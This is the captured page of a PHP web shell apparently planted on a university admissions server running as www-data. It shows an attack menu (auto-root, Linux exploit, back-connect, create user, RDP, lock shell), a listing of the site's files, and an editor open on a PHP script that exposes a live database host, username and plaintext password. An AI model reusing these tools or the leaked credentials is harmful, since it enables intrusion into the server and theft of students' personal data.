Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 3.129.249.240
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
mum /
[ HOME SHELL ]
Name
Size
Permission
Action
ExcelWriterXML
[ DIR ]
drwxr-xr-x
Excel_Writer
[ DIR ]
drwxr-xr-x
Excel_reader
[ DIR ]
drwxr-xr-x
JQGrid3.5
[ DIR ]
drwxr-xr-x
Report_details
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
css_old
[ DIR ]
drwxr-xr-x
css_org
[ DIR ]
drwxr-xr-x
custom_js
[ DIR ]
drwxr-xr-x
custom_src
[ DIR ]
drwxr-xr-x
easy_zip
[ DIR ]
drwxr-xr-x
grid_display_files
[ DIR ]
drwxr-xr-x
halltickets
[ DIR ]
drwxrwxrwx
html_modules
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
img
[ DIR ]
drwxr-xr-x
imported_files
[ DIR ]
drwxrwxrwx
js
[ DIR ]
drwxr-xr-x
jsold
[ DIR ]
drwxr-xr-x
libs
[ DIR ]
drwxr-xr-x
maya-pdf
[ DIR ]
drwxr-xr-x
schema
[ DIR ]
drwxr-xr-x
src
[ DIR ]
drwxr-xr-x
srcold
[ DIR ]
drwxr-xr-x
student_photos
[ DIR ]
drwxrwxrwx
tarka_pdf
[ DIR ]
drwxr-xr-x
tarka_pdf_latest
[ DIR ]
drwxr-xr-x
tcpdf
[ DIR ]
drwxr-xr-x
user_images
[ DIR ]
drwxr-xr-x
validation_files
[ DIR ]
drwxr-xr-x
BCU_English_Text_Books_Prescri...
1.98
KB
-rwxr-xr-x
MainPage.html
16.14
KB
-rwxr-xr-x
MainPagepopup.html
7.05
KB
-rwxr-xr-x
Thumbs.db
473.5
KB
-rwxr-xr-x
admStatistics.php
5.5
KB
-rwxr-xr-x
admcollsum.php
6.07
KB
-rwxr-xr-x
admcollsum_college.php
5
KB
-rwxr-xr-x
admdatasummary.html
2.78
KB
-rwxr-xr-x
admission_sms_push.php
2.77
KB
-rwxr-xr-x
admreportlist.php
14.9
KB
-rwxr-xr-x
app.php
417
B
-rwxr-xr-x
appPaymentDetAPI.php
5.59
KB
-rwxr-xr-x
axis_response.php
5.55
KB
-rwxr-xr-x
bundle slip reforms.pdf
316.28
KB
-rwxr-xr-x
cconfig.php
1.15
KB
-rwxr-xr-x
cntrmesage.html
2.8
KB
-rwxr-xr-x
collegeInfoPopup.html
4.24
KB
-rwxr-xr-x
cronjob_sendsms.php
2.53
KB
-rwxr-xr-x
docverify.php
824
B
-rwxr-xr-x
flash.html
2.15
KB
-rwxr-xr-x
forgotpassword.html
3.31
KB
-rwxr-xr-x
getAppDetAPI.php
2.3
KB
-rwxr-xr-x
getQPdet.php
4.66
KB
-rwxr-xr-x
homepage.html
3.35
KB
-rwxr-xr-x
htsum.php
3.62
KB
-rwxr-xr-x
index.php
80
B
-rwxr-xr-x
index_stop.html
6.03
KB
-rwxr-xr-x
indexlatest.html
5.16
KB
-rwxr-xr-x
indexlogin.html
5.99
KB
-rwxr-xr-x
indexold.html
5.19
KB
-rwxr-xr-x
mainpage.htm
31.7
KB
-rwxr-xr-x
mcverifydet.php
14.83
KB
-rwxr-xr-x
mverifytranscript.php
14.62
KB
-rwxr-xr-x
new.gif
197
B
-rwxr-xr-x
paytm_res.php
4.14
KB
-rwxr-xr-x
pgRedirect.php
2.53
KB
-rwxr-xr-x
pgResponse.php
7.11
KB
-rwxr-xr-x
phddegsum.php
2.86
KB
-rwxr-xr-x
postoffice.php
4.35
KB
-rwxr-xr-x
regnpage.html
11.32
KB
-rwxr-xr-x
rv_update.php
1.36
KB
-rwxr-xr-x
subqp.php
8.6
KB
-rwxr-xr-x
superLog-in.html
6.2
KB
-rwxr-xr-x
timetable.php
2.87
KB
-rwxr-xr-x
valdet.php
8.07
KB
-rwxr-xr-x
valuation.html
2.49
KB
-rwxr-xr-x
verification.php
2.68
KB
-rwxr-xr-x
verify.php
7.04
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : admission_sms_push.php
<?php /* * Api For sending result sms through web export after uploading the result * url == http://oasis.logisys.org/sms/admission_sms_push.php?funivcode=041&fdbname=logisys3_bcu * */ // ini_set('memory_limit','900M'); // ini_set('max_execution_time',0); //connect to database $servername = "97.74.228.93"; $username = "logisys3_logu"; $password = "Logisys@2106"; $conn = new mysqli($servername,$username,$password); if(!$conn) { die("Connection failed: " . mysqli_connect_error()); } $commondb = "logisys3_comexam"; // Will be sent by mohan sir through web export $db = trim($_GET['fdbname']); $univcode = trim($_GET['funivcode']); //Admission Push data to common databse $univcode = ['041','042']; $db = ['logisys3_bcu','logisys3_bnu']; for($i = 0; $i<count($db);$i++) { if( $db[$i] != '' && $univcode[$i] != '') { if($univcode[$i] == '041') { $univname = "Bengaluru Central University"; $univlink = "http://universitysolutions.in/bcu/adm"; } if($univcode[$i] == '042') { $univname = "Bengaluru North University"; $univlink = "http://universitysolutions.in/bnu/adm"; } $sql1 = "insert ignore into {$commondb}.sendsms(funivcode, fregno, fmobileno, fenttype, fsubcode, fmessage, fstatus, fdeleted, fyear, fexamtype,fupdate) select distinct '{$univcode[$i]}', x.fmobileno, x.fmobileno, 'AI', 'AI', concat('Message from ','{$univname}','.',CHAR(13),'Dear ', x.fname, ', You are required to submit the admission details online within 3 days.',CHAR(13),'Visit ','{$univlink}') as fmessage, 'F', 'F', '2018', '2', now() from {$db[$i]}.collstud x where ifnull(x.fsmspush,'') <> 'T' and x.fcollcode <> 'phd' and ifnull(x.factive,'') <> 'T'"; // var_dump($sql1); die(); $result1 = mysqli_query($conn, $sql1); //var_dump($result1); /*$query = "insert ignore into {$commondb}.sendsms(funivcode, fregno, fmobileno, fenttype, fsubcode, fmessage, fstatus, fdeleted, fyear, fexamtype,fupdate) SELECT '041',b.fmobileno,b.fmobileno,'AC','AC', CONCAT('Message from Bengaluru Central University.',CHAR(13),b.fcollcode,' - ',LEFT(c.fcollname,25),', admission enabled for the degree ', GROUP_CONCAT(DISTINCT CONCAT(a.fdegree,'(',a.cnt,') ',CHAR(13)))) AS degcnt,'F', 'F', '2018', '2', NOW() FROM (SELECT fcollcode,fdegree,COUNT(*) AS cnt FROM {$db}.collstud GROUP BY fcollcode,fdegree ) a INNER JOIN {$db}.collstud b ON a.fdegree = b.fdegree AND a.fcollcode = b.fcollcode AND IFNULL(b.fsmspush,'') <> 'T' INNER JOIN {$db}.college c ON b.fcollcode = c.fcollcode GROUP BY a.fcollcode"; $result = mysqli_query($conn, $query);*/ if($result1) { $sql1 = "update {$db[$i]}.collstud x set x.fsmspush = 'T' where ifnull(x.fsmspush,'') <> 'T'"; $result3 = mysqli_query($conn, $sql1); echo "success"; } else { echo "failure"; } } }
Close